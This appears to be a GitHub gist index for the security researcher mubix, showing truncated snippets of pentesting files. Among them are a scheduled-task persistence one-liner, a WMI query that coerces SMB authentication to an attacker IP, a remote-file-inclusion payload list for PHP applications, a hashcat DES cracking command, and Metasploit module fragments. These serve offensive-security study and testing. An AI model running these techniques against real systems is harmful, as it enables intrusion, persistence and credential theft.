View keybase.txt
### Keybase proof
I hereby claim:
* I am mubix on github.
* I am mubix (https://keybase.io/mubix) on keybase.
* I have a public key whose fingerprint is B2B8 E9A7 DD46 5072 8111 7AB0 68B1 8120 B829 7963
To claim this, I am signing this object:
View schtaskmod.ps1
Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions }
View infosec_newbie.md
View handlercheck.rb
#!/usr/bin/env ruby
require 'net/smtp'
def issue_alert
thetimeitfailed = Time.now
message = <<MESSAGE_END
From: HANDLERCHECKIN <root@metasploithandler>
To: Rob Fuller <mubix@hak5.org>
Subject: Handler Checkin
View descrack.txt
hashcat64.exe -m 14000 hashes.txt -o cracked.txt -a 3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1 -w 3
- Device #1: GeForce GTX 1080, 2048/8192 MB allocatable, 20MCU
Session.Name...: hashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]
Custom.Chars...: -1 charsets/DES_full.charset, -2 Undefined, -3 Undefined, -4 Undefined
Hash.Target....: File (des_test.txt)
Hash.Type......: DES (PT = $salt, key = $pass)
View WMIQuery_SMBAuth.ps1
$share = "\\192.168.1.245\share"
$query = "Associators of {win32_LogicalShareSecuritySetting='$share'}"
Get-WmiObject -query $query
<#
Obtained using Impacket's SMBServer.py example
Attacker: 192.168.1.245
Victim: 192.168.1.100
Result:
View rfi-list.txt
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX?
View set_wallpaper.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
View wallpaper.rb
#Change Wallpaper
session = client
key = "HKCU"
wallpaper = "kerby.bmp"
based = "/root/kerby.bmp"
# based = File.join(Msf::Config.install_root, "data", wallpaper)
bgcolor = "0 0 0" # set to 255 255 255 for white
refresh_cmd = "rundll32.exe user32.dll, UpdatePerUserSystemParameters"
View Bulles.md

Cipher Text #1:

214611044b181b161b040341061a000048150f0005554b5558514712031a061648080941060c520609130204195b522c4f170241071a011148000b0c040606455b5157410c141f001b4f47535d55060c050414412252040048030204055506171d1213040f55060a4815060a0e55060d0d41000006105212010f090805125216000e13410a1b1645050814120e115c45214611044b13130c0404034104031717480009054b1a04001a41060f0f551d130d1347000c141b0b48080941060c52090107024f4b341c0148150f001f551b1648160f184b3c52161d0204040e115c

Cipher Text #2:

200e0c041255000004080008041b0145090f03410a1b110c0d0f13411c101315070f14410a071745060e47121e170111011512150e55140a1a4106410c1a1d0148030b001801171748001341121a071748120e050e59520e010549